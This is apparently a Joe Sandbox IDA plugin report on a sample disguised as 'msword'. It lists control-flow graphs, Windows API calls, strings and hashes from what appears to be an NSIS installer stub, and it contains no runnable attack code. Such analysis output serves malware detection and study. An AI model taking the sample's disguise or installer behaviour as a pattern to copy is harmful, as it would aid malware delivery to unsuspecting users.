4210->4209 4220 406009 lstrcpynW 4212->4220 4213 401f06 4219 406009 lstrcpynW 4213->4219 4214->4204 4216 401f15 4221 406009 lstrcpynW 4216->4221 4218->4213 4219->4216 4220->4206 4221->4209 5202 4074bb 5204 407344 
5202->5204 5203 407c6d 5204->5203 5205 4073c2 GlobalFree 5204->5205 5206 4073cb GlobalAlloc 5204->5206 5207 407443 GlobalAlloc 5204->5207 5208 40743a GlobalFree 5204->5208 5205->5206 5206->5203 5206->5204 5207->5203 5207->5204 5208->5207

Control-flow Graph

control_flow_graph 0 4050cd-4050e8 1 405295-40529c 0->1 2 4050ee-4051d5 GetDlgItem * 3 call 403d98 call 404476 call 406805 call 4062a3 GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052c6-4052d3 1->3 4 40529e-4052c0 GetDlgItem CreateThread CloseHandle 1->4 35 4051f3-4051f6 2->35 36 4051d7-4051f1 SendMessageW * 2 2->36 6 4052f4-4052fb 3->6 7 4052d5-4052de 3->7 4->3 11 405352-405356 6->11 12 4052fd-405303 6->12 9 4052e0-4052ef ShowWindow * 2 call 403d98 7->9 10 405316-40531f call 403dca 7->10 9->6 22 405324-405328 10->22 11->10 14 405358-40535b 11->14 16 405305-405311 call 403d18 12->16 17 40532b-40533b ShowWindow 12->17 14->10 20 40535d-405370 SendMessageW 14->20 16->10 23 40534b-40534d call 403d18 17->23 24 40533d-405346 call 404f72 17->24 27 405376-405397 CreatePopupMenu call 406805 AppendMenuW 20->27 28 40528e-405290 20->28 23->11 24->23 37 405399-4053aa GetWindowRect 27->37 38 4053ac-4053b2 27->38 28->22 39 405206-40521d call 403d3f 35->39 40 4051f8-405204 SendMessageW 35->40 36->35 41 4053b3-4053cb TrackPopupMenu 37->41 38->41 46 405253-405274 GetDlgItem SendMessageW 39->46 47 40521f-405233 ShowWindow 39->47 40->39 41->28 43 4053d1-4053e8 41->43 45 4053ed-405408 SendMessageW 43->45 45->45 48 40540a-40542d OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 46->28 51 405276-40528c SendMessageW * 2 46->51 49 405242 47->49 50 405235-405240 ShowWindow 47->50 52 40542f-405458 SendMessageW 48->52 53 405248-40524e call 403d98 49->53 50->53 51->28 52->52 54 40545a-405474 GlobalUnlock SetClipboardData CloseClipboard 52->54 53->46 54->28
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                                        • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                                        • GetClientRect.USER32(?,?), ref: 00405196
                                                                        • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                                        • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                                        • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                                        • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                                        • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                                        • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                                        • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                                        • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                                        • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                                        • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                                        • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                                          • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                                        • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                                        • ShowWindow.USER32(00000000), ref: 004052E7
                                                                        • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                                        • ShowWindow.USER32(00000008), ref: 00405333
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                                        • CreatePopupMenu.USER32 ref: 00405376
                                                                        • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                                        • GetWindowRect.USER32(?,?), ref: 0040539E
                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                                        • OpenClipboard.USER32(00000000), ref: 0040540B
                                                                        • EmptyClipboard.USER32 ref: 00405411
                                                                        • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405427
                                                                        • SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0040545D
                                                                        • SetClipboardData.USER32(0000000D,00000000), ref: 00405468
                                                                        • CloseClipboard.USER32 ref: 0040546E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                        • String ID: @rD$New install of "%s" to "%s"${
                                                                        • API String ID: 2110491804-2409696222
                                                                        • Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                        • Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
                                                                        • Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
                                                                        • Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

                                                                        Control-flow Graph
                                                                        • Function start: 0x403883 (graph rendering not reproduced; nodes are marked Executed / Not Executed)
                                                                        • Calls reached in the graph: COMCTL32 #17, SetErrorMode, OleInitialize, SHGetFileInfoW, GetCommandLineW, GetModuleHandleW, CharNextW, GetTempPathW, DeleteFileW, GetWindowsDirectoryW, lstrcatW, CoUninitialize, ExitProcess, ExitWindowsEx, lstrcmpiW, CreateDirectoryW, SetCurrentDirectoryW, GetCurrentProcess, CopyFileW, CloseHandle; subcalls 4062fc, 406009, 405d06, 4037cc, 403587, 403800, 403859, 407d6e, 405ca0, 40592c, 4060e7, 40677e, 40141d, 406c68, 405c3f
                                                                        APIs
                                                                        • #17.COMCTL32 ref: 004038A2
                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 004038AD
                                                                        • OleInitialize.OLE32(00000000), ref: 004038B4
                                                                          • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                          • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                          • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                        • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                        • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                                        • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                                        • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                                        • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                                        • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                                        • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                                        • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                                        • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                                        • ExitProcess.KERNEL32 ref: 00403AF1
                                                                        • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                                        • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                                        • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                                        • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                                        • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                                        • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                                        • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                                        • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                        • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                                        • API String ID: 2435955865-239407132
                                                                        • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                        • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                                        • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                                        • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                                        Control-flow Graph
                                                                        • Function start: 0x4074bb (graph rendering not reproduced; nodes are marked Executed / Not Executed)
                                                                        • Calls reached in the graph: GlobalFree (4073c2, 40743a), GlobalAlloc (4073cb, 407443)
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                        • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                                        • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                                        • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                        • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: AddressHandleLibraryLoadModuleProc
                                                                        • String ID:
                                                                        • API String ID: 310444273-0
                                                                        • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                        • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                                        • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                                        • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                                        APIs
                                                                        • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                        • FindClose.KERNEL32(00000000), ref: 004062EC
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Find$CloseFileFirst
                                                                        • String ID:
                                                                        • API String ID: 2295610775-0
                                                                        • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                        • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                        • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                        • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                                        Control-flow Graph
                                                                        • Function start: 0x405479 (graph rendering not reproduced; nodes are marked Executed / Not Executed)
                                                                        • Calls reached in the graph: SetWindowPos, ShowWindow, DestroyWindow, SetWindowLongW, GetDlgItem, SendMessageW, IsWindowEnabled, SetClassLongW, KiUserCallbackDispatcher, EnableWindow, GetSystemMenu, EnableMenuItem, lstrlenW, SetWindowTextW, CreateDialogParamW, GetWindowRect, ScreenToClient; subcalls 403d3f, 40141d, 403daf, 40139d, 406805, 403d85, 403d98, 406009, 403dca, 403d18
                                                                        APIs
                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                        • ShowWindow.USER32(?), ref: 004054D2
                                                                        • DestroyWindow.USER32 ref: 004054E6
                                                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                        • GetDlgItem.USER32(?,?), ref: 00405523
                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                        • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                        • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                        • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                        • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                        • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                        • EnableWindow.USER32(?,?), ref: 00405757
                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                        • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                        • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                        • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                        • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                        • String ID: @rD
                                                                        • API String ID: 3282139019-3814967855
                                                                        • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                        • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                        • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                        • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 
40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                        APIs
                                                                        • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                        • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                        • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                        • ShowWindow.USER32(?), ref: 00401753
                                                                        • ShowWindow.USER32(?), ref: 00401767
                                                                        • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                        • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                        • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                        • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                        • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                        • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                        • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                        • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                        • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                        Strings
                                                                        • CreateDirectory: "%s" created, xrefs: 00401849
                                                                        • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                        • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                        • detailprint: %s, xrefs: 00401679
                                                                        • Rename on reboot: %s, xrefs: 00401943
                                                                        • Jump: %d, xrefs: 00401602
                                                                        • BringToFront, xrefs: 004016BD
                                                                        • Rename: %s, xrefs: 004018F8
                                                                        • Rename failed: %s, xrefs: 0040194B
                                                                        • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                        • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                        • Call: %d, xrefs: 0040165A
                                                                        • Sleep(%d), xrefs: 0040169D
                                                                        • SetFileAttributes failed., xrefs: 004017A1
                                                                        • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                        • Aborting: "%s", xrefs: 0040161D
                                                                        • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                        • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                        • API String ID: 2872004960-3619442763
                                                                        • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                        • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                        • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                        • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
